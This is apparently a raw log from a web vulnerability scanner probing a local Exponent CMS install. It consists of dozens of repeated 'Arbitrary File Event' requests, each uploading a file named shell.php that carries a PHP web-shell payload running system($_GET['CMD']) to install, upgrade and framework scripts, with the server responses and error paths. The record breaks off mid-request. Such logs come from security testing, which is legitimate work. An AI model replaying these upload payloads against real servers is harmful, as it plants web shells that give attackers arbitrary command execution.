---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/install/upgrades/add_sef_page_names.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:22 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 169 Content-Type: text/html
Fatal error: Class 'upgradescript' not found in C:\xampp\xampplite\htdocs\exponent\install\upgrades\add_sef_page_names.php on line 18
---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/install/upgrades/fix_news_aggregation.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:22 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 171 Content-Type: text/html
Fatal error: Class 'upgradescript' not found in C:\xampp\xampplite\htdocs\exponent\install\upgrades\fix_news_aggregation.php on line 17
---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/install/upgrades/install_tables.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:23 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/install/upgrades/move_iconset.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:23 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 163 Content-Type: text/html
Fatal error: Class 'upgradescript' not found in C:\xampp\xampplite\htdocs\exponent\install\upgrades\move_iconset.php on line 18
---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/install/upgrades/move_viewsc.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:23 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 162 Content-Type: text/html
Fatal error: Class 'upgradescript' not found in C:\xampp\xampplite\htdocs\exponent\install\upgrades\move_viewsc.php on line 18
---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/install/upgrades/remove_wizard_pages_datatype.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:23 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 179 Content-Type: text/html
Fatal error: Class 'upgradescript' not found in C:\xampp\xampplite\htdocs\exponent\install\upgrades\remove_wizard_pages_datatype.php on line 17
---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/install/upgrades/rename_monthly_view.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:23 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 170 Content-Type: text/html
Fatal error: Class 'upgradescript' not found in C:\xampp\xampplite\htdocs\exponent\install\upgrades\rename_monthly_view.php on line 18
---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/install/popups/db_create.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:24 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 178 Content-Type: text/html
Fatal error: Call to undefined function exponent_lang_loadFile() in C:\xampp\xampplite\htdocs\exponent\install\popups\db_create.php on line 20
---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/install/popups/db_create.php?expid=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 263 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="expid" shell.php ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:24 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 178 Content-Type: text/html
Fatal error: Call to undefined function exponent_lang_loadFile() in C:\xampp\xampplite\htdocs\exponent\install\popups\db_create.php on line 20
---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/install/popups/db_existing.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:24 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 180 Content-Type: text/html
Fatal error: Call to undefined function exponent_lang_loadFile() in C:\xampp\xampplite\htdocs\exponent\install\popups\db_existing.php on line 20
---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/install/popups/db_priv.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:24 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 176 Content-Type: text/html
Fatal error: Call to undefined function exponent_lang_loadFile() in C:\xampp\xampplite\htdocs\exponent\install\popups\db_priv.php on line 20
---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/install/popups/sanity.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:24 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 175 Content-Type: text/html
Fatal error: Call to undefined function exponent_lang_loadFile() in C:\xampp\xampplite\htdocs\exponent\install\popups\sanity.php on line 20
---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/install/pages/admin_user.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:25 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/install/pages/dbcheck.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:25 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/install/pages/dbconfig.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:25 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/install/pages/final.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:25 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/install/pages/sanity.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:26 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/install/pages/save_admin.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:26 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/install/pages/setlang.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:26 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/install/pages/upgrade.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:26 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/install/pages/upgrade_version.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:26 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/install/pages/welcome.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:27 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/install/include/sanity.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:27 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 176 Content-Type: text/html
Fatal error: Call to undefined function exponent_lang_loadFile() in C:\xampp\xampplite\htdocs\exponent\install\include\sanity.php on line 32
---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/install/include/upgradescript.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:27 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/install/include/upgradescript.php?action=shell.php&module=shell.php&controller=shell.php&ajax_action=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:27 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/framework/expFramework.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:28 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/framework/ldap.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:28 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/framework/router.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:28 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/framework/router_maps.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:28 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/framework/validator.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:28 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 3 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/PEAR.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:29 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/PEAR.php?expid=shell.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 263 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="expid" shell.php ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:29 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Tar.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="shell_file"; filename="shell.php" Content-Type: application/octet-stream ' + system($_GET['CMD']) + ''; ?> ------x-- HTTP/1.1 200 OK Date: Fri, 08 Oct 2010 22:27:29 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 X-Powered-By: PHP/5.3.1 Content-Length: 0 Content-Type: text/html ---------------------------------------------------------------- Alert Name: Arbitrary File Event POST /exponent/external/Zip.php HTTP/1.1 Host: localhost Proxy-Connection: keep-alive User-Agent: x Content-Length: 195 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x 